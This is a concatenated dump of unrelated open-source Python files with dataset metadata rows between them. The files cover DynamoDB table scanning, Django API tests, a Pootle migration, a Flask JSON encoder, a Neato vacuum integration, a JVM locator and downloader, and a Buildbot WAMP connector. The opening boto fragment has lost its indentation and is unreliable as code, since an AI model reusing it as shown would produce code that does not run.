The internal method that performs the actual scan. Used extensively
by ``ResultSet`` to perform each (paginated) request.
"""
kwargs = {
'limit': limit,
'segment': segment,
'total_segments': total_segments,
}
if exclusive_start_key:
kwargs['exclusive_start_key'] = {}
for key, value in exclusive_start_key.items():
kwargs['exclusive_start_key'][key] = \
self._dynamizer.encode(value)
# Convert the filters into something we can actually use.
kwargs['scan_filter'] = self._build_filters(
filter_kwargs,
using=FILTER_OPERATORS
)
raw_results = self.connection.scan(
self.table_name,
**kwargs
)
results = []
last_key = None
for raw_item in raw_results.get('Items', []):
item = Item(self)
item.load({
'Item': raw_item,
})
results.append(item)
if raw_results.get('LastEvaluatedKey', None):
last_key = {}
for key, value in raw_results['LastEvaluatedKey'].items():
last_key[key] = self._dynamizer.decode(value)
return {
'results': results,
'last_key': last_key,
}
def batch_get(self, keys, consistent=False):
"""
Fetches many specific items in batch from a table.
Requires a ``keys`` parameter, which should be a list of dictionaries.
Each dictionary should consist of the keys values to specify.
Optionally accepts a ``consistent`` parameter, which should be a
boolean. If you provide ``True``, a strongly consistent read will be
used. (Default: False)
Returns a ``ResultSet``, which transparently handles the pagination of
results you get back.
Example::
>>> results = users.batch_get(keys=[
... {
... 'username': 'johndoe',
... },
... {
... 'username': 'jane',
... },
... {
... 'username': 'fred',
... },
... ])
>>> for res in results:
... print res['first_name']
'John'
'Jane'
'Fred'
"""
        # We pass the keys to the constructor instead, so it can maintain its
# own internal state as to what keys have been processed.
results = BatchGetResultSet(keys=keys, max_batch_get=self.max_batch_get)
        results.to_call(self._batch_get, consistent=consistent)
return results
def _batch_get(self, keys, consistent=False):
"""
The internal method that performs the actual batch get. Used extensively
by ``BatchGetResultSet`` to perform each (paginated) request.
"""
items = {
self.table_name: {
'Keys': [],
},
}
if consistent:
items[self.table_name]['ConsistentRead'] = True
for key_data in keys:
raw_key = {}
for key, value in key_data.items():
raw_key[key] = self._dynamizer.encode(value)
items[self.table_name]['Keys'].append(raw_key)
raw_results = self.connection.batch_get_item(request_items=items)
results = []
unprocessed_keys = []
for raw_item in raw_results['Responses'].get(self.table_name, []):
item = Item(self)
item.load({
'Item': raw_item,
})
results.append(item)
        raw_unprocessed = raw_results.get('UnprocessedKeys', {})
        for raw_key in raw_unprocessed.get('Keys', []):
py_key = {}
for key, value in raw_key.items():
py_key[key] = self._dynamizer.decode(value)
unprocessed_keys.append(py_key)
return {
'results': results,
# NEVER return a ``last_key``. Just in-case any part of
# ``ResultSet`` peeks through, since much of the
# original underlying implementation is based on this key.
'last_key': None,
'unprocessed_keys': unprocessed_keys,
}
def count(self):
"""
Returns a (very) eventually consistent count of the number of items
in a table.
Lag time is about 6 hours, so don't expect a high degree of accuracy.
Example::
>>> users.count()
6
"""
info = self.describe()
return info['Table'].get('ItemCount', 0)
class BatchTable(object):
"""
Used by ``Table`` as the context manager for batch writes.
You likely don't want to try to use this object directly.
"""
def __init__(self, table):
self.table = table
self._to_put = []
self._to_delete = []
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
if not self._to_put and not self._to_delete:
return False
# Flush anything that's left.
self.flush()
return True
def put_item(self, data, overwrite=False):
self._to_put.append(data)
if self.should_flush():
self.flush()
def delete_item(self, **kwargs):
self._to_delete.append(kwargs)
if self.should_flush():
self.flush()
def should_flush(self):
if len(self._to_put) + len(self._to_delete) == 25:
return True
return False
def flush(self):
batch_data = {
self.table.table_name: [
# We'll insert data here shortly.
],
}
for put in self._to_put:
item = Item(self.table, data=put)
batch_data[self.table.table_name].append({
'PutRequest': {
'Item': item.prepare_full(),
}
})
for delete in self._to_delete:
batch_data[self.table.table_name].append({
'DeleteRequest': {
'Key': self.table._encode_keys(delete),
}
})
self.table.connection.batch_write_item(batch_data)
self._to_put = []
self._to_delete = []
return True
| mit | 326,735,140,050,743,940 | 32.925598 | 82 | 0.541564 | false |
crdoconnor/olympia | apps/api/tests/test_urls.py | 14 | 2381 | from django.contrib.auth.models import AnonymousUser
from django.test.client import RequestFactory
from mock import Mock
from nose.tools import eq_
from amo.tests import TestCase
from amo.urlresolvers import reverse
from users.models import UserProfile
from ..urls import SwitchToDRF
class TestDRFSwitch(TestCase):
fixtures = ['base/addon_3615']
def setUp(self):
super(TestDRFSwitch, self).setUp()
self.factory = RequestFactory()
self.user = UserProfile.objects.get(email='[email protected]')
def test_responses(self):
view = SwitchToDRF('Language')
request = self.factory.get(reverse('api.language', args=['1.5']))
request.APP = Mock(id=1)
request.user = AnonymousUser()
eq_(view(request, api_version=1.5).__module__, 'django.http.response')
piston_response = view(request, api_version=1.5).content
self.create_switch('drf', db=True)
eq_(view(request, api_version=1.5).__module__,
'rest_framework.response')
drf_response = view(request, api_version=1.5).render().content
eq_(piston_response, drf_response)
def test_responses_with_handler(self):
view = SwitchToDRF('User', with_handler=True)
request = self.factory.get(reverse('api.language', args=['2']))
class App():
id = 1
def __str__(self):
return str(self.id)
request.APP = App()
request.user = AnonymousUser()
request.amo_user = self.user
eq_(view(request, api_version=2).__module__, 'django.http.response')
self.create_switch('drf', db=True)
eq_(view(request, api_version=2).__module__, 'rest_framework.response')
def test_wrong_format_exceptions(self):
view = SwitchToDRF('Language')
request = self.factory.get(reverse('api.language', args=['1.5']))
request.APP = Mock(id=1)
request.GET = {'format': 'foo'}
request.user = AnonymousUser()
response = view(request, api_version=1.5)
eq_(response.content, '{"msg": "Not implemented yet."}')
eq_(response.status_code, 200)
self.create_switch('drf', db=True)
response = view(request, api_version=1.5)
self.assertTrue('<error>Not found</error>'
in response.render().content)
eq_(response.status_code, 404)
| bsd-3-clause | 6,295,353,910,578,245,000 | 35.630769 | 79 | 0.621588 | false |
translate/pootle | pootle/apps/pootle_store/migrations/0050_set_change_reviewed.py | 6 | 1710 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-21 19:06
from __future__ import unicode_literals
from django.db import migrations
from pootle.core.batch import Batch
from pootle.core.user import get_system_user_id
from pootle_statistics.models import SubmissionTypes
def _update_reviewed(qs, unit_changes):
values = qs.values_list("change", "reviewed_on", "reviewed_by")
for change, reviewed_on, reviewed_by in values.iterator():
unit_changes.filter(pk=change).update(
reviewed_on=reviewed_on,
reviewed_by=reviewed_by)
def _add_reviewed(qs, unit_changes):
values = qs.values_list("id", "reviewed_on", "reviewed_by")
def _create_method(unit, timestamp, user):
return dict(
unit_id=unit,
changed_with=(
SubmissionTypes.SYSTEM
if user == get_system_user_id()
else SubmissionTypes.WEB),
reviewed_by_id=user,
reviewed_on=timestamp)
Batch(unit_changes).create(values, _create_method)
def set_change_reviewed(apps, schema_editor):
units = apps.get_model("pootle_store.Unit").objects.all()
unit_changes = apps.get_model("pootle_store.UnitChange").objects.all()
_update_reviewed(
units.filter(
change__isnull=False).filter(reviewed_by__isnull=False),
unit_changes)
_add_reviewed(
units.filter(
change__isnull=True).filter(reviewed_by__isnull=False),
unit_changes)
class Migration(migrations.Migration):
dependencies = [
('pootle_store', '0049_remove_unit_commented'),
]
operations = [
migrations.RunPython(set_change_reviewed),
]
| gpl-3.0 | -9,012,708,686,653,003,000 | 29.535714 | 74 | 0.638596 | false |
indico/indico-mobile | indicomobile/util/json.py | 1 | 1259 | import datetime
from pytz import utc, timezone
from flask import json, current_app
from flask.ext.mongokit import Document
from bson import ObjectId, DBRef
PATCHED = False
class _JSONEncoder(json.JSONEncoder):
def default(self, obj):
app_tz = timezone(current_app.config.get('TIMEZONE', 'UTC'))
if isinstance(obj, Document):
return obj.fields()
elif isinstance(obj, datetime.datetime):
return {
'date': utc.localize(obj).astimezone(app_tz).strftime('%Y-%m-%d'),
'time': utc.localize(obj).astimezone(app_tz).strftime('%H:%M:%S'),
'tz': utc.localize(obj).astimezone(app_tz).strftime('%Z')
}
elif isinstance(obj, ObjectId):
return getattr(obj, 'id', None)
elif isinstance(obj, DBRef):
return None
return json.JSONEncoder.default(self, obj)
_old_dumps = json.dumps
def patch_json():
"""
    Monkey-patch the default JSON lib to allow serializing MongoKit objects
"""
global PATCHED
if PATCHED:
return
def _json_dumps(*args, **kwargs):
kwargs['cls'] = _JSONEncoder
return _old_dumps(*args, **kwargs)
json.dumps = _json_dumps
PATCHED = True
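# Illustrative usage (sketch only; the import path follows this file's
# location and the datetime value is an example):
#
#     from indicomobile.util.json import patch_json
#     patch_json()
#     json.dumps({'when': datetime.datetime.utcnow()})  # now uses _JSONEncoder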
| gpl-3.0 | -8,738,935,069,041,526,000 | 25.787234 | 82 | 0.603654 | false |
w1ll1am23/home-assistant | homeassistant/components/neato/vacuum.py | 1 | 14227 | """Support for Neato Connected Vacuums."""
from datetime import timedelta
import logging
from pybotvac.exceptions import NeatoRobotException
import voluptuous as vol
from homeassistant.components.vacuum import (
ATTR_STATUS,
STATE_CLEANING,
STATE_DOCKED,
STATE_ERROR,
STATE_IDLE,
STATE_PAUSED,
STATE_RETURNING,
SUPPORT_BATTERY,
SUPPORT_CLEAN_SPOT,
SUPPORT_LOCATE,
SUPPORT_MAP,
SUPPORT_PAUSE,
SUPPORT_RETURN_HOME,
SUPPORT_START,
SUPPORT_STATE,
SUPPORT_STOP,
StateVacuumEntity,
)
from homeassistant.const import ATTR_MODE
from homeassistant.helpers import config_validation as cv, entity_platform
from .const import (
ACTION,
ALERTS,
ERRORS,
MODE,
NEATO_DOMAIN,
NEATO_LOGIN,
NEATO_MAP_DATA,
NEATO_PERSISTENT_MAPS,
NEATO_ROBOTS,
SCAN_INTERVAL_MINUTES,
)
_LOGGER = logging.getLogger(__name__)
SCAN_INTERVAL = timedelta(minutes=SCAN_INTERVAL_MINUTES)
SUPPORT_NEATO = (
SUPPORT_BATTERY
| SUPPORT_PAUSE
| SUPPORT_RETURN_HOME
| SUPPORT_STOP
| SUPPORT_START
| SUPPORT_CLEAN_SPOT
| SUPPORT_STATE
| SUPPORT_MAP
| SUPPORT_LOCATE
)
ATTR_CLEAN_START = "clean_start"
ATTR_CLEAN_STOP = "clean_stop"
ATTR_CLEAN_AREA = "clean_area"
ATTR_CLEAN_BATTERY_START = "battery_level_at_clean_start"
ATTR_CLEAN_BATTERY_END = "battery_level_at_clean_end"
ATTR_CLEAN_SUSP_COUNT = "clean_suspension_count"
ATTR_CLEAN_SUSP_TIME = "clean_suspension_time"
ATTR_CLEAN_PAUSE_TIME = "clean_pause_time"
ATTR_CLEAN_ERROR_TIME = "clean_error_time"
ATTR_LAUNCHED_FROM = "launched_from"
ATTR_NAVIGATION = "navigation"
ATTR_CATEGORY = "category"
ATTR_ZONE = "zone"
async def async_setup_entry(hass, entry, async_add_entities):
"""Set up Neato vacuum with config entry."""
dev = []
neato = hass.data.get(NEATO_LOGIN)
mapdata = hass.data.get(NEATO_MAP_DATA)
persistent_maps = hass.data.get(NEATO_PERSISTENT_MAPS)
for robot in hass.data[NEATO_ROBOTS]:
dev.append(NeatoConnectedVacuum(neato, robot, mapdata, persistent_maps))
if not dev:
return
_LOGGER.debug("Adding vacuums %s", dev)
async_add_entities(dev, True)
platform = entity_platform.current_platform.get()
assert platform is not None
platform.async_register_entity_service(
"custom_cleaning",
{
vol.Optional(ATTR_MODE, default=2): cv.positive_int,
vol.Optional(ATTR_NAVIGATION, default=1): cv.positive_int,
vol.Optional(ATTR_CATEGORY, default=4): cv.positive_int,
vol.Optional(ATTR_ZONE): cv.string,
},
"neato_custom_cleaning",
)
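    # Illustrative only: the service registered above is normally called as
    # ``neato.custom_cleaning`` with data such as
    # ``{"entity_id": "vacuum.living_room", "mode": 2, "navigation": 1,
    #    "category": 4, "zone": "Living room"}``; the entity id and zone name
    # are made-up examples.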
class NeatoConnectedVacuum(StateVacuumEntity):
"""Representation of a Neato Connected Vacuum."""
def __init__(self, neato, robot, mapdata, persistent_maps):
"""Initialize the Neato Connected Vacuum."""
self.robot = robot
self._available = neato is not None
self._mapdata = mapdata
self._name = f"{self.robot.name}"
self._robot_has_map = self.robot.has_persistent_maps
self._robot_maps = persistent_maps
self._robot_serial = self.robot.serial
self._status_state = None
self._clean_state = None
self._state = None
self._clean_time_start = None
self._clean_time_stop = None
self._clean_area = None
self._clean_battery_start = None
self._clean_battery_end = None
self._clean_susp_charge_count = None
self._clean_susp_time = None
self._clean_pause_time = None
self._clean_error_time = None
self._launched_from = None
self._battery_level = None
self._robot_boundaries = []
self._robot_stats = None
def update(self):
"""Update the states of Neato Vacuums."""
_LOGGER.debug("Running Neato Vacuums update for '%s'", self.entity_id)
try:
if self._robot_stats is None:
self._robot_stats = self.robot.get_general_info().json().get("data")
except NeatoRobotException:
_LOGGER.warning("Couldn't fetch robot information of %s", self.entity_id)
try:
self._state = self.robot.state
except NeatoRobotException as ex:
if self._available: # print only once when available
_LOGGER.error(
"Neato vacuum connection error for '%s': %s", self.entity_id, ex
)
self._state = None
self._available = False
return
self._available = True
_LOGGER.debug("self._state=%s", self._state)
if "alert" in self._state:
robot_alert = ALERTS.get(self._state["alert"])
else:
robot_alert = None
if self._state["state"] == 1:
if self._state["details"]["isCharging"]:
self._clean_state = STATE_DOCKED
self._status_state = "Charging"
elif (
self._state["details"]["isDocked"]
and not self._state["details"]["isCharging"]
):
self._clean_state = STATE_DOCKED
self._status_state = "Docked"
else:
self._clean_state = STATE_IDLE
self._status_state = "Stopped"
if robot_alert is not None:
self._status_state = robot_alert
elif self._state["state"] == 2:
if robot_alert is None:
self._clean_state = STATE_CLEANING
self._status_state = (
f"{MODE.get(self._state['cleaning']['mode'])} "
f"{ACTION.get(self._state['action'])}"
)
if (
"boundary" in self._state["cleaning"]
and "name" in self._state["cleaning"]["boundary"]
):
self._status_state += (
f" {self._state['cleaning']['boundary']['name']}"
)
else:
self._status_state = robot_alert
elif self._state["state"] == 3:
self._clean_state = STATE_PAUSED
self._status_state = "Paused"
elif self._state["state"] == 4:
self._clean_state = STATE_ERROR
self._status_state = ERRORS.get(self._state["error"])
self._battery_level = self._state["details"]["charge"]
if not self._mapdata.get(self._robot_serial, {}).get("maps", []):
return
mapdata = self._mapdata[self._robot_serial]["maps"][0]
self._clean_time_start = mapdata["start_at"]
self._clean_time_stop = mapdata["end_at"]
self._clean_area = mapdata["cleaned_area"]
self._clean_susp_charge_count = mapdata["suspended_cleaning_charging_count"]
self._clean_susp_time = mapdata["time_in_suspended_cleaning"]
self._clean_pause_time = mapdata["time_in_pause"]
self._clean_error_time = mapdata["time_in_error"]
self._clean_battery_start = mapdata["run_charge_at_start"]
self._clean_battery_end = mapdata["run_charge_at_end"]
self._launched_from = mapdata["launched_from"]
if (
self._robot_has_map
and self._state["availableServices"]["maps"] != "basic-1"
and self._robot_maps[self._robot_serial]
):
allmaps = self._robot_maps[self._robot_serial]
_LOGGER.debug(
"Found the following maps for '%s': %s", self.entity_id, allmaps
)
self._robot_boundaries = [] # Reset boundaries before refreshing boundaries
for maps in allmaps:
try:
robot_boundaries = self.robot.get_map_boundaries(maps["id"]).json()
except NeatoRobotException as ex:
_LOGGER.error(
"Could not fetch map boundaries for '%s': %s",
self.entity_id,
ex,
)
return
_LOGGER.debug(
"Boundaries for robot '%s' in map '%s': %s",
self.entity_id,
maps["name"],
robot_boundaries,
)
if "boundaries" in robot_boundaries["data"]:
self._robot_boundaries += robot_boundaries["data"]["boundaries"]
_LOGGER.debug(
"List of boundaries for '%s': %s",
self.entity_id,
self._robot_boundaries,
)
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def supported_features(self):
"""Flag vacuum cleaner robot features that are supported."""
return SUPPORT_NEATO
@property
def battery_level(self):
"""Return the battery level of the vacuum cleaner."""
return self._battery_level
@property
def available(self):
"""Return if the robot is available."""
return self._available
@property
def icon(self):
"""Return neato specific icon."""
return "mdi:robot-vacuum-variant"
@property
def state(self):
"""Return the status of the vacuum cleaner."""
return self._clean_state
@property
def unique_id(self):
"""Return a unique ID."""
return self._robot_serial
@property
def extra_state_attributes(self):
"""Return the state attributes of the vacuum cleaner."""
data = {}
if self._status_state is not None:
data[ATTR_STATUS] = self._status_state
if self._clean_time_start is not None:
data[ATTR_CLEAN_START] = self._clean_time_start
if self._clean_time_stop is not None:
data[ATTR_CLEAN_STOP] = self._clean_time_stop
if self._clean_area is not None:
data[ATTR_CLEAN_AREA] = self._clean_area
if self._clean_susp_charge_count is not None:
data[ATTR_CLEAN_SUSP_COUNT] = self._clean_susp_charge_count
if self._clean_susp_time is not None:
data[ATTR_CLEAN_SUSP_TIME] = self._clean_susp_time
if self._clean_pause_time is not None:
data[ATTR_CLEAN_PAUSE_TIME] = self._clean_pause_time
if self._clean_error_time is not None:
data[ATTR_CLEAN_ERROR_TIME] = self._clean_error_time
if self._clean_battery_start is not None:
data[ATTR_CLEAN_BATTERY_START] = self._clean_battery_start
if self._clean_battery_end is not None:
data[ATTR_CLEAN_BATTERY_END] = self._clean_battery_end
if self._launched_from is not None:
data[ATTR_LAUNCHED_FROM] = self._launched_from
return data
@property
def device_info(self):
"""Device info for neato robot."""
info = {"identifiers": {(NEATO_DOMAIN, self._robot_serial)}, "name": self._name}
if self._robot_stats:
info["manufacturer"] = self._robot_stats["battery"]["vendor"]
info["model"] = self._robot_stats["model"]
info["sw_version"] = self._robot_stats["firmware"]
return info
def start(self):
"""Start cleaning or resume cleaning."""
try:
if self._state["state"] == 1:
self.robot.start_cleaning()
elif self._state["state"] == 3:
self.robot.resume_cleaning()
except NeatoRobotException as ex:
_LOGGER.error(
"Neato vacuum connection error for '%s': %s", self.entity_id, ex
)
def pause(self):
"""Pause the vacuum."""
try:
self.robot.pause_cleaning()
except NeatoRobotException as ex:
_LOGGER.error(
"Neato vacuum connection error for '%s': %s", self.entity_id, ex
)
def return_to_base(self, **kwargs):
"""Set the vacuum cleaner to return to the dock."""
try:
if self._clean_state == STATE_CLEANING:
self.robot.pause_cleaning()
self._clean_state = STATE_RETURNING
self.robot.send_to_base()
except NeatoRobotException as ex:
_LOGGER.error(
"Neato vacuum connection error for '%s': %s", self.entity_id, ex
)
def stop(self, **kwargs):
"""Stop the vacuum cleaner."""
try:
self.robot.stop_cleaning()
except NeatoRobotException as ex:
_LOGGER.error(
"Neato vacuum connection error for '%s': %s", self.entity_id, ex
)
def locate(self, **kwargs):
"""Locate the robot by making it emit a sound."""
try:
self.robot.locate()
except NeatoRobotException as ex:
_LOGGER.error(
"Neato vacuum connection error for '%s': %s", self.entity_id, ex
)
def clean_spot(self, **kwargs):
"""Run a spot cleaning starting from the base."""
try:
self.robot.start_spot_cleaning()
except NeatoRobotException as ex:
_LOGGER.error(
"Neato vacuum connection error for '%s': %s", self.entity_id, ex
)
def neato_custom_cleaning(self, mode, navigation, category, zone=None):
"""Zone cleaning service call."""
boundary_id = None
if zone is not None:
for boundary in self._robot_boundaries:
if zone in boundary["name"]:
boundary_id = boundary["id"]
if boundary_id is None:
_LOGGER.error(
"Zone '%s' was not found for the robot '%s'", zone, self.entity_id
)
return
_LOGGER.info("Start cleaning zone '%s' with robot %s", zone, self.entity_id)
self._clean_state = STATE_CLEANING
try:
self.robot.start_cleaning(mode, navigation, category, boundary_id)
except NeatoRobotException as ex:
_LOGGER.error(
"Neato vacuum connection error for '%s': %s", self.entity_id, ex
)
| apache-2.0 | -2,330,766,307,765,658,000 | 34.041872 | 88 | 0.560905 | false |
phihag/jippy | jippy/_jvm.py | 1 | 8204 |
import ctypes
import hashlib
import io
import platform
import os
import sys
import tarfile
import tempfile
import threading
from . import _util
from ._jvm_intf import *
_JVM_DOWNLOAD_URL = 'http://www.java.com/en/download/manual.jsp?locale=en'
# Mapping from Python architecture (platform.machine()) to Java's
_JAVA_ARCH = {
'x86_64': 'amd64',
}
NO_CACHE = False
JVM_LOCROOT_SYSTEM = '/usr/share/jippy/jvms/'
JVM_LOCROOT_USER = os.path.expanduser('~/.local/share/jippy/jvms/')
DEFAULT_CACHE_DIR = os.path.expanduser('~/.local/share/jippy/downloads/')
class NoJVMFoundError(RuntimeError):
pass
class JVMError(BaseException):
pass
def _listall(path):
try:
for fn in os.listdir(path):
yield os.path.join(path, fn)
except OSError: # File not there or inaccessible, ignore
return
def _list_jvm_candidates_roots():
""" Yield all candidates for a JVM """
if 'JAVA_HOME' in os.environ:
yield os.environ['JAVA_HOME']
# No yield from for backwards compatibility
platName = sys.platform + '-' + platform.machine()
for c in _listall(os.path.join(JVM_LOCROOT_USER, platName)):
yield c
for c in _listall(os.path.join(JVM_LOCROOT_SYSTEM, platName)):
yield c
yield os.path.dirname(os.path.abspath(os.readlink('/usr/bin/java')))
for c in _listall('/usr/lib/jvm'):
yield c
def _list_jvm_locations():
for root in _list_jvm_candidates_roots():
if is_jvm_location(root):
yield root
def _find_libjvm_so(loc):
java_arch = _JAVA_ARCH.get(platform.machine())
subdirs = [
os.path.join('jre', 'lib', java_arch, 'server'), # OpenJDK on debian
'lib', # Sun JRE on debian
os.path.join('lib', java_arch, 'server'), # Oracle JDK on Linux
os.path.curdir, # Full location
]
for subdir in subdirs:
fn = os.path.join(loc, subdir, 'libjvm.so')
if os.path.isfile(fn):
return fn
return None
def is_jvm_location(loc):
return _find_libjvm_so(loc) is not None
def find_jvm_location(locations=None, auto_install=False):
"""
Find a JVM on the system.
If auto_install is set, automatically download and install a JVM if none is
present (may take a while)
"""
if not locations:
locations = _list_jvm_locations()
try:
return next(locations)
    except StopIteration:
if auto_install:
return install_jvm()
else:
raise NoJVMFoundError()
def install_jvm(loc_root=JVM_LOCROOT_USER, cache_dir=None):
"""
Download and install a JVM into the specified location root.
Return the actual location.
cache_dir specifies the location of the directory where the large downloads
    (not the index page) are cached. Set to NO_CACHE to disable caching.
"""
import urllib
import re
if cache_dir is None:
cache_dir = DEFAULT_CACHE_DIR
dlp = urllib.urlopen(_JVM_DOWNLOAD_URL)
try:
dlPage = dlp.read()
finally:
dlp.close()
def _findLink(linkText):
m = re.match(r'.*?<a title="' + re.escape(linkText) + '" href="([^"]+)"', dlPage, re.DOTALL)
if not m:
raise ValueError('Cannot find specified link text ' + repr(linkText) + ' in JVM download page')
return m.group(1)
def _downloadFile(url):
""" Returns a bytes object of the downloaded url """
if cache_dir != NO_CACHE:
cacheId = hashlib.sha512(url.encode('utf-8')).hexdigest()
cacheFn = os.path.join(cache_dir, cacheId)
try:
with open(cacheFn, 'rb') as cacheFile:
return cacheFile.read()
except IOError:
pass # Cache file not present, download
dl = urllib.urlopen(url)
try:
content = dl.read()
finally:
dl.close()
if cache_dir != NO_CACHE:
try:
_util.makedirs(cache_dir)
with tempfile.NamedTemporaryFile(dir=cache_dir, prefix='jvm_cache_' + cacheId, delete=False) as tf:
tf.write(content)
# atomic - the cache file should always be of full size
os.rename(tf.name, cacheFn)
except IOError:
pass # Creation of cache file failed, but that's not that important
return content
if sys.platform == 'linux2':
if platform.machine() == 'i386':
url = _findLink(' Download Java software for Linux')
elif platform.machine() == 'x86_64':
url = _findLink(' Download Java software for Linux x64')
else:
raise NotImplementedError('JVM installation not yet implemented for ' + sys.platform + ' / ' + platform.machine())
content = _downloadFile(url)
        with tarfile.open(mode='r:gz', fileobj=io.BytesIO(content)) as tf:
platf = sys.platform + '-' + platform.machine()
vname = next(n for n in tf.getnames() if '/' not in n)
jvmDir = os.path.join(loc_root, platf)
_util.extractall_safely(tf, jvmDir)
path = os.path.join(jvmDir, vname)
else:
raise NotImplementedError('JVM installation not yet implemented for ' +
sys.platform)
return path
class JVM(object):
# For details on the inner workings, see
# http://docs.oracle.com/javase/1.5.0/docs/guide/jni/spec/invocation.html
def __init__(self, path=None, autostart=True, auto_install=None):
if path is None:
path = find_jvm_location(auto_install=auto_install)
self._path = path
self._autostart = autostart
@property
def started(self):
return hasattr(self, '_dll')
def start(self):
"""
Start running the current JVM in the current process.
Note that current JVM implementations support only one JVM per process.
"""
self._dllPath = _find_libjvm_so(self._path)
if self._dllPath is None:
raise OSError('Cannot find JVM in specified path. '
'Call find_jvm_location(..., auto_install=True) to download one.')
self._dll = ctypes.cdll.LoadLibrary(self._dllPath)
jvm = JavaVM()
env = JNIEnv()
vm_args = _JavaVMInitArgs()
vm_args.version = 0x00010002
res = self._dll.JNI_GetDefaultJavaVMInitArgs(ctypes.pointer(vm_args))
if res != 0:
raise JVMError('JVM is too old, update to 1.2+')
        # TODO: boot the VM up. The call is left commented out until JavaVM and
        # JNIEnv are declared as proper ctypes out-parameters; invoking
        # JNI_CreateJavaVM with no arguments would crash the process.
        # self._dll.JNI_CreateJavaVM(ctypes.byref(jvm), ctypes.byref(env),
        #                            ctypes.pointer(vm_args))
def call(self, name, **args):
if not self.started and self._autostart:
self.start()
assert self.started
# TODO attach thread if necessary
# TODO actually call
# TODO handle result
def matches_spec(self, spec):
if spec.get('path'):
if spec.get('path') != self._path:
return False
# autostart is ignored
return True
_singleton_jvm_data = {
'jvm': None,
'lock': threading.Lock(),
}
def jvm(jvmSpec={}, auto_install=None):
"""
Return a singleton JVM.
Since virtually all JVM implementations only support one VM per process,
that's all we can do.
jvmSpec defines the requirements for the JVM. Current supported keys are:
path - The location of the JVM in the file system
Set auto_install to download and install a JVM if none is found.
"""
with _singleton_jvm_data['lock']:
if _singleton_jvm_data['jvm']:
if not _singleton_jvm_data['jvm'].matches_spec(jvmSpec):
raise Exception('Java VM already started, but it does not conform to requested specs')
else:
_singleton_jvm_data['jvm'] = JVM(auto_install=auto_install,
**jvmSpec)
return _singleton_jvm_data['jvm']
__all__ = ['JVM_LOCROOT_SYSTEM', 'JVM_LOCROOT_USER', 'NO_CACHE',
'is_jvm_location', 'install_jvm', 'jvm']
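# Illustrative usage sketch of the public API above; it assumes the module's
# dependencies (_util, the download URL, the JNI ctypes declarations) are defined
# earlier in this file and that a JVM is installed or may be auto-installed.
if __name__ == '__main__':
    _location = find_jvm_location(auto_install=True)
    _vm = jvm({'path': _location})
    print('Using JVM at %s (started: %s)' % (_location, _vm.started))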
| apache-2.0 | 4,436,772,552,041,946,000 | 32.622951 | 126 | 0.5902 | false |
Lekensteyn/buildbot | master/buildbot/wamp/connector.py | 2 | 5738 | # This file is part of Buildbot.  Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from __future__ import absolute_import
from __future__ import print_function
import txaio
from autobahn.twisted.wamp import ApplicationSession
from autobahn.twisted.wamp import Service
from autobahn.wamp.exception import TransportLost
from twisted.internet import defer
from twisted.python import failure
from twisted.python import log
from buildbot.util import ascii2unicode
from buildbot.util import service
class MasterService(ApplicationSession, service.AsyncMultiService):
"""
concatenation of all the wamp services of buildbot
"""
def __init__(self, config):
ApplicationSession.__init__(self)
service.AsyncMultiService.__init__(self)
self.config = config
self.leaving = False
self.setServiceParent(config.extra['parent'])
@defer.inlineCallbacks
def onJoin(self, details):
log.msg("Wamp connection succeed!")
for handler in [self] + self.services:
yield self.register(handler)
yield self.subscribe(handler)
yield self.publish(u"org.buildbot.%s.connected" % (self.master.masterid))
self.parent.service = self
self.parent.serviceDeferred.callback(self)
@defer.inlineCallbacks
def onLeave(self, details):
if self.leaving:
return
# XXX We don't handle crossbar reboot, or any other disconnection well.
# this is a tricky problem, as we would have to reconnect with exponential backoff
# re-subscribe to subscriptions, queue messages until reconnection.
# This is quite complicated, and I believe much better handled in autobahn
# It is possible that such failure is practically non-existent
# so for now, we just crash the master
log.msg("Guru meditation! We have been disconnected from wamp server")
log.msg(
"We don't know how to recover this without restarting the whole system")
log.msg(str(details))
yield self.master.stopService()
def onUserError(self, e, msg):
log.err(e, msg)
def make(config):
if config:
return MasterService(config)
else:
# if no config given, return a description of this WAMPlet ..
return {'label': 'Buildbot master wamplet',
'description': 'This contains all the wamp methods provided by a buildbot master'}
class WampConnector(service.ReconfigurableServiceMixin, service.AsyncMultiService):
serviceClass = Service
name = "wamp"
def __init__(self):
service.AsyncMultiService.__init__(self)
self.app = self.router_url = None
self.serviceDeferred = defer.Deferred()
self.service = None
def getService(self):
if self.service is not None:
return defer.succeed(self.service)
d = defer.Deferred()
@self.serviceDeferred.addCallback
def gotService(service):
d.callback(service)
return service
return d
def stopService(self):
if self.service is not None:
self.service.leaving = True
service.AsyncMultiService.stopService(self)
@defer.inlineCallbacks
def publish(self, topic, data, options=None):
service = yield self.getService()
try:
ret = yield service.publish(topic, data, options=options)
except TransportLost:
log.err(failure.Failure(), "while publishing event " + topic)
return
defer.returnValue(ret)
@defer.inlineCallbacks
def subscribe(self, callback, topic=None, options=None):
service = yield self.getService()
ret = yield service.subscribe(callback, topic, options)
defer.returnValue(ret)
@defer.inlineCallbacks
def reconfigServiceWithBuildbotConfig(self, new_config):
if new_config.mq.get('type', 'simple') != "wamp":
return
wamp = new_config.mq
log.msg("Starting wamp with config: %r", wamp)
router_url = wamp.get('router_url', None)
# This is not a good idea to allow people to switch the router via reconfig
# how would we continue the current transactions ?
# how would we tell the workers to switch router ?
if self.app is not None and self.router_url != router_url:
raise ValueError(
"Cannot use different wamp router url when reconfiguring")
if router_url is None:
return
self.router_url = router_url
self.app = self.serviceClass(
url=self.router_url,
extra=dict(master=self.master, parent=self),
realm=ascii2unicode(wamp.get('realm', 'buildbot')),
make=make
)
wamp_debug_level = wamp.get('wamp_debug_level', 'error')
txaio.set_global_log_level(wamp_debug_level)
yield self.app.setServiceParent(self)
yield service.ReconfigurableServiceMixin.reconfigServiceWithBuildbotConfig(self,
new_config)
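# Illustrative sketch (not part of Buildbot itself): a master-side service would
# typically reach this connector through the master object and use publish /
# subscribe as below. The helper names and topic strings are hypothetical.
#
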